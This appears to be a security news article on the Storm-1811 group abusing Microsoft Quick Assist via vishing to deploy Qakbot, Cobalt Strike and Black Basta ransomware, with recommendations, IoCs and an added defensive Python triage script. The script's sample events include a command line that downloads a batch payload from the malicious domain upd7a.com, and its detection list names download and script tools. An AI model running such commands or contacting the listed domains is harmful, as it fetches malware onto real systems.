
Hackers Exploiting Microsoft’s Quick Assist Tool To Deliver Ransomware

Hackers often target remote-assistance tools because they provide a direct channel into target systems with minimal effort.

These tools are built for remote control and access, which makes them attractive to attackers seeking to breach networks or take over specific devices.

Microsoft observed the Storm-1811 group using Quick Assist for social engineering attacks that deploy Black Basta ransomware. 

Exploiting Quick Assist’s Remote Access

The attacks begin with vishing (voice phishing), abuse Quick Assist’s remote access for initial compromise, and then deliver malware such as:

  • Qakbot
  • Cobalt Strike

Microsoft is adding warnings to Quick Assist about tech support scams, and its security products include detections that block the malicious activity. Blocking unused remote tools and educating users to recognise scams can further reduce risk.


The threat actors impersonate IT support staff in vishing calls and trick targeted users into granting them Quick Assist remote access. 

They typically pretend to be fixing a problem, or offer help with a flood of spam email that the target is receiving.

Code screen (Source – Microsoft)

According to Microsoft, while on the call the attackers get the victim to open Quick Assist, enter the security code the attacker provides, enable screen sharing, and then grant control, which fully compromises the device.

Screen sharing (Source – Microsoft)

Once control is taken through Quick Assist, the attacker runs scripts that download malicious payloads, some of which pose as spam-filter updates and harvest credentials.

Observed payloads included Qakbot, remote monitoring and management tools such as ScreenConnect, and Cobalt Strike; Storm-1811 then used the access obtained through Qakbot and Cobalt Strike to deploy Black Basta ransomware.

After initial access, the attackers use ScreenConnect for persistence and lateral movement, NetSupport Manager for remote control, and OpenSSH tunneling. 

They perform domain enumeration and use PsExec to deploy Black Basta ransomware, building on the access gained through Qakbot and Cobalt Strike. 

Black Basta is a closed ransomware offering distributed by a small number of actors. Because those actors rely on initial access brokers, defending against the pre-ransomware stages (the vishing call, the Quick Assist session and the initial malware) reduces the impact of the threat.

Recommendations

The recommendations are:

  • Block and uninstall unused remote tools like Quick Assist, and use secure alternatives like Remote Help.
  • Educate users on identifying tech support scams and not providing unauthorized remote access.
  • Report suspected malicious remote sessions and tech support scams.
  • Train users on protecting info, spotting phishing, and reporting recon attempts.
  • Implement anti-phishing solutions like Defender for Office 365.
  • Enable cloud-delivered protection and tamper protection in antivirus.
  • Turn on network protection against malicious domains.
  • Use automated investigation and remediation in Defender for Endpoint.
  • Follow Microsoft’s ransomware hardening guidance.

IoCs

Domain Names:

  • upd7a[.]com
  • upd7[.]com
  • upd9[.]com
  • upd5[.]pro

SHA-256:

  • 71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8
  • 0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0
  • 1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30
  • 93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7
  • 1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb

ScreenConnect Relay:

  • instance-olqdnn-relay.screenconnect[.]com

NetSupport C2:

  • greekpool[.]com

Cobalt Strike Beacon C2:

  • zziveastnews[.]com
  • realsepnews[.]com
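The attack chain described above (Quick Assist session, script execution, payload download, C2 traffic) and the IoC list lend themselves to a simple telemetry triage. The following Python script is an added example, not code from the article or from Microsoft: it flags process-creation events where QuickAssist.exe spawns a script or download tool, DNS queries to the listed domains or their subdomains, and files whose SHA-256 appears in the list. The domains and hashes are the article's own; the list of suspicious child processes, the event dictionary layout, the host names and the sample events are assumptions constructed for illustration.

```python
"""Triage helper for Storm-1811-style Quick Assist abuse.

Added example, not code from the article or from Microsoft. It runs three
checks over endpoint telemetry: process-creation events where QuickAssist.exe
spawns a script or download tool, DNS queries to the article's IoC domains
(including their subdomains), and file hashes on the article's SHA-256 list.
The event records in SAMPLE_EVENTS are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Domains and hashes as listed in the article's IoC section; the defanged
# "[.]" is written as "." so they compare equal to real telemetry.
IOC_DOMAINS = {
    "upd7a.com", "upd7.com", "upd9.com", "upd5.pro",  # payload staging
    "instance-olqdnn-relay.screenconnect.com",       # ScreenConnect relay
    "greekpool.com",                                 # NetSupport C2
    "zziveastnews.com", "realsepnews.com",           # Cobalt Strike Beacon C2
}
IOC_SHA256 = {
    "71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8",
    "0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0",
    "1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30",
    "93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7",
    "1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb",
}

# Assumption: a genuine help-desk session has no reason to launch these from
# the Quick Assist process tree. Tune the list to your environment.
REMOTE_TOOL_PARENT = "quickassist.exe"
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe", "bitsadmin.exe",
    "certutil.exe", "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe",
}
# Loose host-name pattern used to pull candidate domains out of a command line.
HOST_RE = re.compile(r"[a-z0-9][a-z0-9.-]*\.[a-z]{2,}")


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def normalize_domain(name: str) -> str:
    """Refang '[.]', lower-case and drop a trailing dot (as seen in DNS logs)."""
    return name.replace("[.]", ".").lower().rstrip(".")


def matches_ioc_domain(name: str) -> bool:
    """True if name is an IoC domain or a subdomain of one (not a lookalike)."""
    d = normalize_domain(name)
    return any(d == ioc or d.endswith("." + ioc) for ioc in IOC_DOMAINS)


def triage(events: list) -> list:
    """Apply all checks to event dicts with a 'type' of process, dns or file."""
    findings = []
    for ev in events:
        host = ev.get("host", "?")
        if ev["type"] == "process":
            parent = basename(ev.get("parent_image", ""))
            child = basename(ev.get("image", ""))
            cmdline = ev.get("command_line", "")
            if parent == REMOTE_TOOL_PARENT and child in SUSPICIOUS_CHILDREN:
                findings.append(Finding("quickassist_spawns_tool", host,
                                        f"{parent} -> {child}: {cmdline}"))
            # A command line naming an IoC domain is flagged whatever its parent.
            for cand in HOST_RE.findall(cmdline.lower()):
                if matches_ioc_domain(cand):
                    findings.append(Finding("cmdline_ioc_domain", host, cand))
        elif ev["type"] == "dns" and matches_ioc_domain(ev["query"]):
            findings.append(Finding("dns_ioc_domain", host, ev["query"]))
        elif ev["type"] == "file" and ev["sha256"].lower() in IOC_SHA256:
            findings.append(Finding("file_ioc_hash", host, ev["sha256"].lower()))
    return findings


# Constructed sample telemetry (not real logs): one compromised host, one clean.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS-042",
     "parent_image": r"C:\Windows\System32\QuickAssist.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c curl -o C:\Users\Public\upd.bat http://upd7a.com/upd.bat"},
    {"type": "process", "host": "WS-017",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
    {"type": "dns", "host": "WS-042", "query": "instance-olqdnn-relay.screenconnect.com."},
    {"type": "dns", "host": "WS-017", "query": "www.example.com"},
    {"type": "file", "host": "WS-042",
     "sha256": "71D50B74F81D27FEEFBC2BC0F631B0ED7FCDF88B1ABBD6D104E66638993786F8"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run against the sample telemetry, the script reports four findings, all on WS-042, and nothing on the clean host. The domain check matches subdomains of an indicator (the ScreenConnect relay query carries a trailing dot, as DNS client logs often do) but deliberately not lookalike names, and the hash comparison is case-insensitive because different EDR products emit SHA-256 values in different cases.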


Tushar Subhra Dutta

